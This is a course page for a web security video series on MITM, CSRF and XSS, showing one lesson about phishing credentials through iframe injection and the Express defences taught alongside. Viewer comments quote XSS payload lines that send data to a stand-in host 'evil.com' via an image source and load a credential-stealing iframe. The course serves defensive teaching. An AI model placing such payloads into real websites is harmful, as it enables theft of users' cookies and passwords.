illustration for Web Security Essentials: MITM, CSRF, and XSS

Course

Web Security Essentials: MITM, CSRF, and XSS

1
Course Overview: Web Security Essentials
4m 17s
2
Simulate Man in the Middle Attacks and Inspect Network Traffic with Charles Proxy
3m 1s
3
Add https to a Localhost Express App to Prevent MITM Attacks
2m 33s
4
Redirect All HTTP Traffic to HTTPS in Express to Ensure All Responses are Secure
2m 19s
5
Set the Secure Cookie Flag to Ensure Cookies are Only Sent Over Secure Connections
1m 35s
6
Add HSTS Headers to Express Apps to Ensure All Requests are https Requests
4m 15s
7
Create a Proof of Concept Exploit of a CSRF Vulnerable Website
4m 1s
8
Mitigate CSRF Attacks by Setting the SameSite Cookie Flag in Express
2m 46s
9
Add CSRF Token Middleware to an Express Server to Mitigate CSRF
6m 12s
10
Make an XSS Payload to Read a Cookie from a Vulnerable Website
3m 50s
11
Set the httpOnly Cookie Flag in Express to Ensure Cookies are Inaccessible from JavaScript
1m 27s
12
Make an XSS Payload to Read document.body from a Vulnerable Website
53s
13
Prevent Inline Script Execution by Implementing Script-Src CSP Headers in Express
5m 30s
14
Read Document Content from a Vulnerable Website via Script Tag Injection in an XSS Payload
1m 11s
15
Add a Nonce Based script-src Header in Express to Only Allow Scripts that Match the Nonce
3m 7s
16
Prompt Users for Credentials from a Vulnerable Website via iframe Injection
1m 36s
17
Add a default-src CSP Header in Express to Enforce an Allowlist and Mitigate XSS
2m 15s

Prompt Users for Credentials from a Vulnerable Website via iframe Injection

Mike Sherov

InstructorMike Sherov

Share this video with your friends

In this lesson, we'll learn how to exploit an XSS vulnerability to prompt victims for their usernames and passwords on a vulnerable site by loading up a IFRAME from the attacker's website. This will demonstrate that even though we've already mitigated JS based XSS attacks, there are other ways to exploit XSS, and we'll need a more robust CSP header to completely mitigate XSS, which we'll discover in our next lesson!

Gheorghe

~ 4 years ago

typo: 'propmt' should be -> 'prompt'

Gheorghe

~ 4 years ago

at payload level: img.src = https://evel.com:666/hijack?payload=${payload} should be img.src = https://evil.com:666/hijack?payload=${payload}

Gheorghe

~ 4 years ago

i guess that 'payload', this time, should be only :

< iframe hidden src="https://evil.com:666/steal.html"></iframe>

Lucas Minter

Lucas Minter

~ 4 years ago

Thanks for this! I got the transcripts updated!